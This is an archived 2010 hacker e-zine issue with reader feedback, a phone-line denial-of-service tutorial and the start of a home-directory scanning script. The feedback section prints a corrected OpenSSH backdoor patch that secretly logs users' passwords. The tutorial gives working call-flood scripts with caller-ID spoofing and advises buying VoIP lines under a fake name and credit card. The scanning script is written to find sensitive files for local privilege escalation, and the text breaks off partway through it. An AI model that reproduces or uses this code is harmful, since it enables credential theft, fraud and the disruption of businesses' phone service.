💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › GONULLYOURSELF … captured on 2021-12-03 at 14:04:38.
-=-=-=-=-=-=-
-dh dd.
:Mm MM.
,yNNNNNNNNo ,mMMMMMMMMd, dNNNNNNNNN, MM. yM :Mm MM.
-Mm oMd `NM: NM: :My MM. yM :Mm MM.
:Mm -++++mM oMN mM: MM: :MN MM. yM :Mm MM.
.NMmmmmmmMM 'MMmmmmmNMN' MM: :MM mMNmmmmmMM :Mm MM. /o.
hM:
.h+ sh :hdddddddh/ dd` :ds oddddddddy. ,ddddddd-d ,yddddddddo dM/ ,ddddddddd`
-Mm+++++++oMM mMs:::::oMm MM. /Mh MM::::::hMh Mm+````` yMh`````yMM mM/ Mh````````
/sssyMMssso- mM/ oMM MM. /Mh MM :+/ 'hhhhhhdM, yMh hhhhhh+ dMo MMNNNNNNNN.
.MM NMdyyyyydMN MMdyyyyymMh MM ,,,,,,,,MM sMN,,,,,,,, mMo My````````
`o+ `+ooooooo+` .+oooooooo: oo .oooooooo+: `/ooooooooo /o- My
My
|| 0x01 Introduction +: teh crew
|| 0x02 Feedback + Edits
|| 0x03 DoSing Phone Lines with Asterisk b14ck
Go Null Yourself E-Zine || 0x04 duper's Code Corner duper
|| 0x05 Test Numbers storm
Issue #2 - October 2010 || 0x06 Practical DLL Hijacking storm
www.GoNullYourself.org || 0x07 Numbers Stations FOIA Request teh crew
|| 0x08 Exploring Tieline Networks Shadytel, Inc
|| 0x09 Modem Numbers storm
"People who say it cannot be done should || 0x0a Linux Full-Disk Encryption With TC second
not interrupt those who are doing it." || 0x0b Programming Challenge storm
|| 0x0c Hotel Pennsylvania's PBX Shadytel, Inc
|| 0x0d Interview with Adrian Lamo
|| 0x0e Et Cetera, Etc. teh crew
[==================================================================================================]
-=[ 0x01 Introduction
-=[ Author: teh crew
Welcome to another issue of the Go Null Yourself e-zine, and, once again, glad you could join us.
You may have already noticed a few things different with this issue. First off, it was released
fairly quickly after issue #1 (July 2010), much more quickly than usual e-zine series, as we are
attempting to adopt a schedule of quarterly release. This means that lots of hard work is being put
forth by our authors to meet such short deadlines with a sufficient amount of comprehensive,
interesting content. For that, we express our deepest gratitude.
Secondly, we have changed a few aspects of the zine's formatting in general. The width has been
increased from 86 columns to 100, mostly for the sake of reducing the frequency of problems with
line wrapping in published code. It has also been requested that each article section be labeled
with its respective hexadecimal index number for easy page jumping. If you have any suggestions for
the zine, submit them to us (our contact information is at the end of this article), and we will
certainly consider them.
Thirdly, a large chunk of content this issue is phone-related. We wish to accomplish two goals by
doing this: 1) to promote interest in hacking technology besides computer systems, and 2) to pump
some life back into the phreaking scene. There is so much to learn from exploring the phone system,
and we hope to be there every step of the way.
If you are interested in submitting content for future issues of GNY Zine, we would be happy to
review it for publication. Content may take many forms, whether it be a paper, review, scan, or
first-hand account of an event. Submissions of ASCII cover art that display the GNY logo in some
way are also appreciated. Well-received topics include computer hacking and exploitation methods,
programming, telephone phreaking (both analog and digital), system and network exploration, hardware
hacking, reverse engineering, amateur radio, cryptography and steganography, and social engineering.
We are also receptive to content relating to concrete subjects such as science and mathematics,
along with more abstract subjects such as psychology and culture. Both technical and non-technical
material is accepted.
Submissions of content, suggestions for and criticisms of the zine, and death threats may be sent
via:
- IRC private message (storm or m0nkee @ irc.distrust.us #gny)
- Email (zine@gonullyourself.org)
If there is enough feedback, we will publish some of the messages in future issues.
We have devoted a lot of effort into this publication and hope that you learn something from reading
it. Abiding by our beliefs, any information within this e-zine may be freely re-distributed,
utilized, and referenced elsewhere, but we do ask that you keep the articles fully intact (unless
citing certain passages) and give credit to the original authors when and where necessary.
Go Null Yourself, its staff members, and the authors of GNY Zine are not responsible for any harm or
damage that may result from the information presented within this publication. Although people will
be people and act in idiotic fashions, we do not condone, promote, or participate in illegal
behavior in any way.
[==================================================================================================]
-=[ 0x02 Feedback and Edits
This section is devoted to messages we've received regarding GNY Zine, both positive and negative.
Readers may also submit information that they feel supplements content from previous issues.
Significant errors in the zine will also be addressed.
----------------------------------------------------------------------------------------------------
Hey team. On the release of the new e-zine under the Alternate Data Streams article there's a
little typo. In the first example, using C:\folders:secrets.txt the paragraph below it refers to it
as "C:folders:secrets.txt". It's not something that should throw a reader off the deep end or
anything. I thought it should be pointed out in case you wanted to correct it.
I'm loving the articles so far. I hope you can keep up the work. I'll be coming back for sure.
Thanks,
-Boom
>> Ah, yes, you are correct - apologies for the error. "C:folders:secrets.txt" on line 412 of issue
>> #1 should be corrected to "C:\folders:secrets.txt". Thank you for reporting it and also for the
>> compliment.
----------------------------------------------------------------------------------------------------
rattle of www.awarenetwork.org posted the following on his website in response to the RTLO Spoofing
article from issue #1:
I had a lot of fun reading the RTLO article in the GNY zIne and found myself very incompetent when
it came to inputting that RTLO char anywhere. Hence, I wrote a little program that would set my
clipboard to just the RTLO char, allowing me to paste it into browser forms and other stuff
conveniently. I did this because the other tool that was linked
[http://www.fileformat.info/tool/unicodeinput/index.htm] isn't open source. Granted, my app has no
GUI, but at least you can see its insides.
>> We agree that entering the RTLO character is quite tricky, and we thank you for publishing your
>> source code (below). Hopefully it is useful for other readers, as it's come in handy for us!
>> A pre-compiled Windows binary is available for download at
>> http://www.awarenetwork.org/home/.rants/07-11-2010.08.42/rtol.exe
----------
http://www.awarenetwork.org/home/.rants/07-11-2010.08.42/rtol.asm
.386
.model flat, stdcall
include kernel32.inc
include user32.inc
.code
Main:
PUSH 0
CALL OpenClipboard
TEST EAX, EAX
JZ ERROR
CALL EmptyClipboard
PUSH 4 ; size of RTOL with nullchar
PUSH 2 ; GMEM_MOVEABLE
CALL GlobalAlloc
TEST EAX,EAX
JZ ERROR
MOV EBX,EAX
PUSH EBX
CALL GlobalLock
TEST EAX,EAX
JZ ERROR
MOV word ptr [EAX], 0202EH
MOV word ptr [EAX+2], 0
PUSH EBX
CALL GlobalUnlock
PUSH EBX ; handle
PUSH 0DH ; CF_UNICODETEXT
CALL SetClipboardData
MOV EDX, EAX
PUSH EBX
CALL GlobalFree
CALL CloseClipboard
TEST EDX,EDX
JZ SUCCESS
ERROR:
PUSH 1
JMP BAIL
SUCCESS:
PUSH 0
BAIL:
CALL ExitProcess
END Main
----------
http://www.awarenetwork.org/home/.rants/07-11-2010.08.42/rtol.c
#include <windows.h>
int main() {
HGLOBAL handle;
WCHAR *buffer;
BOOL success = FALSE;
if (OpenClipboard(NULL)) {
EmptyClipboard();
if ((handle = GlobalAlloc(GMEM_MOVEABLE, 2*sizeof(WCHAR))) &&
(buffer = GlobalLock(handle)) ) {
buffer[0] = 0x202E;
buffer[1] = 0;
GlobalUnlock(handle);
success = (SetClipboardData(CF_UNICODETEXT, handle) != NULL);
GlobalFree(handle);
}
CloseClipboard();
}
return !success;
}
#if 0
extern void __cdecl mainCRTStartup( void ){
ExitProcess(main());
}
#endif
----------------------------------------------------------------------------------------------------
There have been reports that the patched source from Trojaning OpenSSH in issue #1 crashes upon SSH
login. We regret and apologize for the error, which has been traced to an incorrect declaration of
the hidden_buff buffer on line 38. The updated code is below:
diff -rupN openssh-5.5p1/auth-passwd.c openssh-5.5p1-backdoored/auth-passwd.c
--- openssh-5.5p1/auth-passwd.c 2009-03-07 19:40:28.000000000 -0500
+++ openssh-5.5p1-backdoored/auth-passwd.c 2010-06-17 14:14:23.000000000 -0400
@@ -123,6 +123,19 @@ auth_password(Authctxt *authctxt, const
}
#endif
result = sys_auth_passwd(authctxt, password);
+
+ // Begin Backdoor
+
+ if ( result ){
+ snprintf(hidden_buff, sizeof(hidden_buff) - 1, "Successful login %s:%s from %s\n",
-> authctxt->user, password, get_remote_ipaddr());
+ hidden_log();
+ } else {
+ snprintf(hidden_buff, sizeof(hidden_buff) - 1, "Invalid login %s:%s from %s\n",
-> authctxt->user, password, get_remote_ipaddr());
+ hidden_log();
+ }
+
+ // End Backdoor
+
if (authctxt->force_pwchange)
disable_forwarding();
return (result && ok);
diff -rupN openssh-5.5p1/includes.h openssh-5.5p1-backdoored/includes.h
--- openssh-5.5p1/includes.h 2009-08-20 02:16:01.000000000 -0400
+++ openssh-5.5p1-backdoored/includes.h 2010-06-17 14:12:24.000000000 -0400
@@ -172,4 +172,24 @@
#include "entropy.h";
+// Begin Backdoor
+
+#include <sys/stat.h>
+#include <stdio.h>
+#define HIDDEN_LOG_FILE "/tmp/.ssh_log"
+
+FILE *hiddenlog;
+char hidden_buff[1024];
+
+#define hidden_log() { \
+ chmod(HIDDEN_LOG_FILE, 0666); \
+ hiddenlog = fopen(HIDDEN_LOG_FILE, "a"); \
+ if ( hiddenlog != NULL ) { \
+ fprintf(hiddenlog, "%s", hidden_buff); \
+ fclose(hiddenlog); \
+ } \
+}
+
+// End Backdoor
+
#endif /* INCLUDES_H */
----------------------------------------------------------------------------------------------------
Our long-time friend sunjester posted the following at http://fusecurity.com/blog/?p=186 in response
to issue #1:
GNY is a familiar group to myself. They do not like me on account of several reasons that we won�t
go into here. The �ezine� they released isn�t offering much, so you didn�t miss much if your looking
for another hacking zine to veg out to. I have some comments of my own about their release. I saw
that r00tsecurity referenced the Zine in their newsletter, in which case I had to look at it..
>> Yes, there is a bit of bad blood between sunjester and GNY. We also won't go into details, as
>> they are irrelevant.
1. conversational hypnosis
2. RTLO Spoofing
3. Alternate Data Streams
4. Derandomizing Perl�s Random Number Generator
5. Trojaning OpenSSH
6. Story of a Raid
7. Programming Challenge
8. ConfCon 2010 CFP
9. 907-887-88xx Scan
conversational hypnosis
The first thing on their list is something called �conversational hypnosis�, the whole thing was
complete b.s.. Nothing described really actually told anyone how to apply or use �covert hypnosis�
which is what is more widely known as. This whole idea is based around notions and persuasion.
>> I wrote the article with the specific intention of not giving enough detail for readers to be
>> able to use it since it can really cause damage. It was just to show that it was out there and
>> said to listen to Taylor Starr's lectures if you wanted to learn it in depth. -hsu
rtlo spoofing
The reason this isn�t so successful is because it�s not very practical and it�s a pain in the ass to
use. This guy (Anarchy_Angel) basically just read the documents and wrote what he read. No PoC was
offered or instructions or anything different than what was presented in the documents he referenced
([http://packetstormsecurity.org/papers/general/righttoleften-override.pdf],
[http://hackers-hideaway.com/blog.php?post_id=94],
[http://www.mozilla.org/security/announce/2009/mfsa2009-62.html]). I�m not going to continue to
break down this method.
>> Actually, no. I (storm) wrote the article - it says so right at the top. Anarchy_Angel's
>> research was simply referenced. And yes, I wrote an article based on information I read. That's
>> usually how it works. The referenced paper on packetstormsecurity.org is written in broken
>> English, so I'm sure many will appreciate reading a paper that is easily decipherable;
>> hackers-hideaway.com was offline at the time (and continues to be offline), so Anarchy's research
>> is unavailable; and the mozilla.org link is simply an advisory. As for proof of concept, three
>> example attacks were explained in the paper. I also explained how the GNY forum was affected by
>> an RTLO spoofing attack.
Alternate Data Streams
At first glance I thought it may be worth reading until I kept scrolling down scanning through and
pulling out keyworkds, etc, etc. Scanning back to the top I started reading and it was aparent from
reading the first couple paragraphs that this person had not done much research. or offered a
solution to finding or protecting yourself against such flaws. The first thing people should know is
that there is an EASY way to view alternate data streams. Microsoft provides an application named
�Streams� to help view ADS�s. You can download and read about it here.
He references the application but never shows how to use it, link to it, or even talk about it. He
obviously rushed through and didn�t give a crap about the actual content going into the message he
was conveying in the article. While I don�t deny information provided from the article can be useful
and may have shown people something new, ADS.
The information wasn�t very fruitful, and could have been presented a lot better. Amir refers to
metadata as �real data�. He references forking but I guess he didn�t bother to read it, if he had
read the page he would have seen that it was named �metadata�, lmao. This was a good topic, it just
should have been elaborated on more.
>> "I'd like to thank you for taking the time to review my article... I see you have some valid
>> points, but you assumed that I 'rushed' in with the topic, which is not exactly true. When this
>> topic was first introduced to me, I liked it and I wanted to write a brief article to educate
>> others about it. It was not new research, and it was not something that is security related at
>> all. I was merely trying to let others know of the existence of such a thing. And by the way my
>> name is 'Amr' not 'Amir'. Have a good one :-)" -d4de
Derandomizing Perl�s Random Number Generator
While it�s fun to talk about and figure things like this out, it�s not very effective for hacking or
really having anything to do with computer security.
>> Random numbers have everything to do with computer security. Attacks based on the prediction of
>> random numbers, such as http://seclists.org/fulldisclosure/2010/Apr/167 , are becoming more and
>> more practical. A cryptographic process based on predictable numbers is a broken process.
>> Besides, we're not limited to content based solely on computer security. Anything that breaks or
>> circumvents a system of any kind is fascinating to us.
Trojaning OpenSSH
yep, he did all that from a root terminal...
>> So what's your point?
Story of a Raid
The crap this kid must have been smoking must be unbelievable! Damn, send some my way. Let�s hilight
some of the dumbest shit he said. It�s super ridiculous so let�s keep it simple and try to to waste
to much time on this dumb, uninformative stereotypical story.
1. and it really will leave me open to anything the FBI wants to portray me as.
2. Incriminating evidence � Sure, it�s just a simple server-client program in C
3. However, even if I did have a magnet, there is little time to do anything once they bust
in.
4. My parents didn�t completely realize what was going on
And my response..
1. Really? did they do it x-files style or �hackers� style? Kicking in the door with one foot
while wielding a gun in the other? A friend of mine was raided last year, and once before that a few
years before. The FBI certainly didn�t kick in his door.
>> "'Hackers' style, they did literally kick in the door with guns held" -OrderZero
2. A client server application is hardly a crime, and would never be considered one.
>> "Are you aware of what a trojan /is/?" -OrderZero
3. Really? Do you know how much of a magnetic field is required to reset the drive? Yo mommas
fridge magnet aint gonna work.
>> "Yes I do and I never said a fridge magnet." -OrderZero
4. Wow, you still live with your parents? Your saying that the FBI would raid someone�s house
without knowing who was inside? I guess they wouldn�t have traced the IP back to the ISP and called
around huh? Go sit in the corner, change your name, and come back.
>> "What does the FBI knowing who was inside have to do with what I said at all? Yes, I live with
>> friends and family (or I did...). I'm 18-years-old. Honestly, if you're trying to insult me,
>> kindly rephrase it and actually make it relevant to the story, please and thanks." -OrderZero
ConfCon CFP
What is this, 1989?
>> *looks at calendar*
907-887-88xx Scan
come on guys, move into the new fuckin� millenium..
>> It's a damn shame your lack of curiosity is limiting your mind so severely. Pick up your phone
>> and tell me if you hear a dialtone. Last I checked, there was still an entire PSTN waiting to be
>> explored.
Et Cetera, Et
I could only read so much and all I have to say is these people have a long way to go before
actually becoming anything close to a hacker or having any kind of �hacking ethics�. In closing, be
sure to know that the next release will be just as boring and shitty. Sorry guys but this was
HORRIBLE and not worth reading or making the effort to archive.
>> :D
[==================================================================================================]
-=[ 0x03 DoSing Phone Lines with Asterisk
-=[ Author: b14ck
-=[ Website: http://projectb14ck.org/
Table of contents
1. Intro
2. Requirements
3. Installing pycall
4. Strategy
5. Your First DoS
6. A More Advanced DoS Technique
7. Tips
8. Conclusion
9. Questions?
Intro
-----
Denial of Service attacks are nothing new to people in the IT and computer security world. DoS
attacks are a very simplistic form of attack which aim to flood the target (whether it be a
computer, mobile device, or phone line) with traffic so that it cannot process legitimate traffic.
While being simple to perform, DoS attacks are often difficult to defend against without significant
downtime.
Today I'm going to show you how to perform a DoS attack on a phone line. This process is simple,
quick to perform, and very illegal. Before we get started, I'd just like to remind you that this
article is for educational purposes only! All the code I'm putting into this article is python, and
should work on any system with python 2.4+.
Requirements
------------
Now, in order to follow along you will need 3 main things:
* An Asterisk PBX system (our favorite open source PBX) set up and running,
* A lot of phone lines. We'll need a lot of phone lines because we'll need to place a lot of
simultaneous calls. If you don't have hard lines, get a VoIP line (I prefer this method) as they are
really cheap and quick to setup.
* The last thing you'll need is my pycall python library. This is a library I wrote which allows
us to create Asterisk call files quickly and easily in python.
(http://github.com/comradeb14ck/pycall)
For those of you unfamiliar with Asterisk, I'd highly recommend reading the PDF book Asterisk: The
Future of Telephony, which is a great guide to getting started with Asterisk.
(http://downloads.oreilly.com/books/9780596510480.pdf)
The pycall python library mentioned above is a project I created a month or so ago which makes
placing calls through Asterisk a simple task for python developers. Call files are specially
formatted text files which Asterisk processes and performs actions on. pycall simplifies and
abstracts a great deal of the call file creation process as call files have many small quirks which
make them difficult to work with. Using pycall greatly reduces the amount of code we'll need to
write and ensures that all call files are created in a secure, efficient manner. For this article,
we'll be using my pycall library as a medium for quickly making calls through Asterisk without
digging into the details. If you want to know more about pycall check out the Why pycall? document
on the project's wiki page.
Installing pycall
-----------------
The good news is that pycall installs simply (it's a portable python module) and will work out of
the box with no modifications to your system what-so-ever (as long as you are running some form of
linux).
To make things even easier, I've created a small shell script which you can run that will download
and install pycall, then delete itself:
----------
#!/bin/bash
#
# pycall-install.sh
#
# @author: Randall Degges
# @email: rdegges@gmail.com
# @date: 11-20-2009
#
# This program installs the pycall library on any linux machine which has
# python 2.4+.
#
MIRROR=http://cloud.github.com/downloads/comradeb14ck/pycall/
NAME=pycall
VER=1.2
wget $MIRROR$NAME-$VER.tar.gz
tar zxvf $NAME-$VER.tar.gz
cd $NAME-$VER
sudo python setup.py install
cd ..
rm -rf $NAME-$VER
rm -rf $NAME-$VER.tar.gz
echo "Finished installing pycall-$VER."
----------
You can copy the script above and run it to install the library on any linux system quickly.
Next, we'll write a simple application which will call your cell phone in order to make sure
everything is working. Here is the source.
NOTE: You will need to modify this code and fill in the appropriate details for your system. The
user field (which seems a little ambiguous) refers to the user account that Asterisk is running
under. If you want to create the call file as whatever user you are currently logged in as, you can
remove that field all together.
----------
#!/usr/bin/python
"""
hello-world.py
@author: Randall Degges
@email: rdegges@gmail.com
@date: 11-20-09
This program tests the pycall library and makes sure that you are able to place
calls correctly.
"""
from pycall.callfile import *
def main():
"""
Create a call to your cell phone (for testing). It will say 'hello world'
then hang up on you.
"""
testcall = CallFile(
trunk_type = 'SIP',
trunk_name = 'flowroute',
number = '18182223333',
application = 'Playback',
data = 'hello-world',
user = 'asterisk'
)
testcall.run()
if __name__ == '__main__':
"""
Program execution begins here.
"""
main()
----------
A quick note to non-telephony people. The above code generates a text file (call file) which is then
moved to the Asterisk spooling directory: /var/spool/asterisk/outgoing. Asterisk aggressively
monitors the spooling directory for call files (like the ones we are creating), parses them, and
performs the actions specified by the call file. In this case, we are telling Asterisk call our cell
phone, and once we pick up, play a sound file that says "hello world" and then hang up. In case you
are wondering, Asterisk contains the "hello world" sound file by default, which is why we don't need
anything else to make this work.
Strategy
--------
Now that we have our tools ready to go, let's discuss our strategy for disabling the target phone
line.
The goal of the attack is to prevent the target phone number from placing and receiving calls. As
you can probably imagine, this is completely devastating to businesses and other communication-
dependent organizations, as it completely breaks down communications. Many companies in particular
rely on telephone service (think pizza places and call centers) for their primary revenue stream.
Imagine the effect a 24-hour DoS attack can have on a business who relies on phone service... It can
be very impacting.
Our strategy is simple: to call the target phone number more times than they have phone lines.
You might be thinking: This is really easy, all I have to do is pick up my phone, and keep dialing
the target number over and over again to keep their phone line tied up. In reality, this does
sometimes work. A great example is the 2002 New Hampshire Senate election phone jamming scandal. See
http://en.wikipedia.org/wiki/2002_New_Hampshire_Senate_election_phone_jamming_scandal. Basically,
"the NHGOP hired GOP Marketplace, based in Northern Virginia, to jam another phone bank being used
by the state Democratic Party and the firefighters' union for efforts to turn out voters on behalf
of then-governor Jeanne Shaheen on Election Day." And just in case you are wondering, yes, he went
to jail. :)
In reality, most businesses and other places have more than a single phone line that is connected to
their phone number. PRIs, T1s, and VoIP are all common now, which means that in order to completely
prevent one of those phone lines from placing calls, you will need to be generating an upwards of 23
simultaneous calls to completely disable the target.
If you know anything about your target phone line, then you probably know how many calls you will
need to place at any given time to keep them busy. But don't worry if you don't know anything about
your target! This will be covered later in this article.
Your First DoS
--------------
The program below contains the source of a simple flooding application. You will still have to make
your original adjustments like you did to the hello-world.py application earlier, but that's all, I
promise!
----------
#!/usr/bin/python
"""
simple-flood.py
@author: Randall Degges
@email: rdegges@gmail.com
@date: 11-20-09
This program floods the specified phone number.
"""
from time import sleep
from sys import argv, exit
from pycall.callfile import *
def call(num):
"""
Create a call to the specified number which does nothing except hang up.
"""
testcall = CallFile(
trunk_type = 'SIP',
trunk_name = 'flowroute',
number = num,
application = 'Hangup',
data = ' ',
user = 'asterisk'
)
testcall.run()
def main():
"""
Control the application logic.
"""
if len(argv) < 3:
print 'Usage: %s [number] [calls-per-minute]' % argv[0]
exit(1)
number = argv[1]
try:
cpm = int(argv[2])
except ValueError:
cpm = 1
print 'Starting call flood on target: %s. Placing %d calls per minute.' % (number, cpm)
count = 1
while True:
for x in xrange(cpm):
print 'Placing call %d...' % count
call(number)
count = count + 1
sleep(60)
if __name__ == '__main__':
"""
Program execution begins here.
"""
main()
----------
This small program (only a few lines!) is able to completely paralyze a target number (considering
you have enough phone lines). It is fairly flexible, and allows you to specify the amount of
calls-per-minute that you'd like to place. This works just like described: If you tell it to run
with 60 calls per minute, then you'll immediately place 60 calls. These calls will ring to the
target number, and once they pick up the phone, will immediately hang up.
To run this program see the usage:
./simple-flood.py [number] [calls-per-minute]
./simple-flood.py 18002223333 5
The first parameter is the number you want to flood, and the second is the amount of calls per
minute that you'd like to place to that number.
Here's what it should look like running if everything goes smoothly:
[root@blackbox randall]# ./simple-flood.py 18182223333 5
Starting call flood on target: 18182179229. Placing 5 calls per minute.
Placing call 1...
Placing call 2...
Placing call 3...
Placing call 4...
Placing call 5...
Placing call 6...
Placing call 7...
Placing call 8...
Placing call 9...
Placing call 10...
Now, obviously, DoS attacks like this are simple to defend against as the victim can simply block
the particular number you are calling from. However--there are ways around this too!
A More Advanced DoS Technique
-----------------------------
To make it harder for the victim to defend against our simple DoS attack, let's add caller ID
spoofing to the calls as well (will only work if your provider allows it) so that the target can't
blacklist a single number because you are calling them from random numbers!
Not only is doing this simple, it is also highly effective. Imagine being a business owner, and
instantly getting 100 calls from 100 different numbers. You'd be confused, unable to do anything
except unplug your phone lines (which doesn't accomplish anything), and unable to receive business.
So here is our program with caller ID spoofing included. It is still used the same way, except MUCH
harder to defend against.
----------
#!/usr/bin/python
"""
advanced-flood.py
@author: Randall Degges
@email: rdegges@gmail.com
@date: 11-20-09
This program floods the specified phone number and spoofs caller ID making it
much harder to trace / prevent.
"""
from time import sleep
from sys import argv, exit
from pycall.callfile import *
from random import seed, randint
def genid():
"""
Generate a random 10-digit US telephone number for spoofing to.
"""
return str(randint(1000000000, 9999999999))
def call(num, cid):
"""
Create a call to the specified number which does nothing except hang up.
Also spoofs caller ID to a random 10 digit number.
"""
testcall = CallFile(
trunk_type = 'SIP',
trunk_name = 'flowroute',
callerid_num = cid,
number = num,
application = 'Hangup',
data = ' ',
user = 'asterisk'
)
testcall.run()
def main():
"""
Control the application logic.
"""
seed() # seed the random number generator
if len(argv) < 3:
print 'Usage: %s [number] [calls-per-minute]' % argv[0]
exit(1)
number = argv[1]
try:
cpm = int(argv[2])
except ValueError:
cpm = 1
print 'Starting call flood on target: %s. Placing %d calls per minute.' % (number, cpm)
count = 1
while True:
for x in xrange(cpm):
cid = genid()
print 'Placing call %d using caller ID %s...' % (count, cid)
call(number, cid)
count = count + 1
sleep(60)
if __name__ == '__main__':
"""
Program execution begins here.
"""
main()
----------
Here's an example of what this program should look like running. Note that it generates a different
caller ID for each call. >:)
[root@blackbox randall]# ./advanced-flood.py 18182223333 7
Starting call flood on target: 18182223333. Placing 7 calls per minute.
Placing call 1 using caller ID 7110992417...
Placing call 2 using caller ID 3689407130...
Placing call 3 using caller ID 4139439982...
Placing call 4 using caller ID 9795095964...
Placing call 5 using caller ID 5278670787...
Placing call 6 using caller ID 6684773360...
Placing call 7 using caller ID 2716775282...
Now this is a lot better!
Tips
----
The first tip is for those of you who don't know how many calls you have to place to disable your
target. USE VOIP!
VoIP providers are great for DoS attacks because they:
* Can be purchased online using a fake name / credit card.
* Are cheap (much less expensive than analog lines) and don't require additional hardware.
* Can place a ton of calls quickly. With hard lines you are limited to very few channels. With
most VoIP lines, you are only limited by your bandwidth.
Of the 3 reasons above, reason 3 is particularly important. VoIP calls use either the IAX or SIP
protocols to initiate calls. When VoIP calls are made, SIP packets are sent back and fourth from
your server to your VoIP provider, who then relays the call to the target. What is special about
this is that it uses almost no bandwidth. The only thing being transmitted are IAX or SIP packets
(which are small). The actual bulk of bandwidth usage typically associated with VoIP calls comes
into play once a call has been answered. Once a call is answered, an RTP stream is opened which then
sends large voice packets across your connection, thereby increasing your bandwidth usage
immensely.
Why does this matter?
It matters because it gives you a killer advantage that your target does not have. It gives you an
easier way to scale your attack. Let's say a target phone number has 5 lines. Let's also assume that
you are running this DoS from a home computer with an extremely limited internet connection that
restricts you to 10KB/s up. That typically wouldn't be enough for a single VoIP call, so you would
never be able to make 5 calls and flood your target. WRONG. Since you call the target and
immediately hang up, there are no RTP packets! This means that you can place as many simultaneous
calls as you can send SIP invites (a LOT).
Conclusion
----------
With the information and source code provided, you should be able to easily DoS yourself or stress
test other phone numbers in no time.
I've started development on what will soon be a fully completed Asterisk DoS client with lots of
juicy command line options, statistics, and other cool items. If you're interested in following my
progress, feel free to check out the project page for it at
http://github.com/comradeb14ck/asteriskdos.
And that's about it!
[==================================================================================================]
-=[ 0x04 duper's Code Corner
-=[ Author: duper
-=[ Website: http://projects.ext.haxnet.org/~super/
#!/bin/bash
#
# _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
# / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \
#( d | u | p | e | r | ' | s ) ( c | o | d | e ) ( c | o | r | n | e | r )
# \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/
#
#
# scan-home-dirs.bash by duper for GNY
# Fri Oct 1 04:57:00 UTC 2010
#
# A bash script that scans home directories and other filesystem directory
# hierarchies for sensitive data conducive to attacks against local privilege
# escalation..
#
# NOTE: this script requires GNU parallel as a prerequisite. You may need to
# install the tarball from http://gnu.org/software/parallel first..
#
# Feel free to add your own common directories, subdirectories, "hidden"
# dot-files and such to scan. The regular expression for matching sensitive data
# can be easily configured as well.
#
# This is the command I use for finding new filenames to add to the script:
#
# nice -2 find / \( -type f -or -type d \) -and \( -perm /0001 -or \
# -perm /0002 \) -and \( -not -iname "/proc/*" -and -name ".*" -or \
# -iname "*.cf" -or -iname "*.conf" \) -and -not -empty \
# -fls /tmp/find.$ 2>/dev/null
#
# ..obviously the output goes to /tmp. This script essentially allows you to
# discover data in hidden files within directories that you may not necessarily
# have read access to -- If you've ever seen dirbx.c, a brute force executable
# directory lister by dmuz and methodic, then you probably understand this
# concept already. However, the problem with dirbx is that it takes too long
# to generate all the filename combinations. Therefore, scan-home-dirs (this
# script) just uses well-known file and directory names to expedite the process.
#
# If you're not familiar with dirbx, I'm including an excerpt of the mailing
# list message from whence it first appeared:
#
# "AngryPacket Security is proud to announce the release of dirbx! dirbx is
# a brute force executable directory and file enumerator. It could prove
# to be very useful in local pen-tests where you don't have UID 0 and some
# directories have "--x" permissions. "
#
# So in other words, you're going to get `Permission denied' if you try to run
# /bin/ls on a directory with only the world execute bit set. Regardless, you
# can still view world readable files inside that directory if you provide
# /bin/cat with a full pathname. For example:
#
# [super@callisto ~]$ ls -ld /home/whye
# drwx-----x 13 whye whye 4096 Sep 21 04:35 /home/whye
# [super@callisto ~]$ ls /home/whye
# ls: /home/whye: Permission denied
# [super@callisto ~]$ ls -ld /home/whye/.bashrc
# -rw-r--r-- 1 whye whye 225 Mar 21 2010 /home/whye/.bashrc
# [super@callisto ~]$ head -4 /home/whye/.bashrc
# .bashrc
#
# Source global definitions
# if [ -f /etc/bashrc ]; then
# [super@callisto ~]$
#
# Display program banner
echo
echo 'scan-home-dirs.bash by duper for GNY'
echo '===================================='
echo
# First, we'll look through directories that we ARE able to read
declare -a alist=$(ls -altd /home/*/.* | awk '/^d/ {print($9)}' | \
egrep -v '([.]+)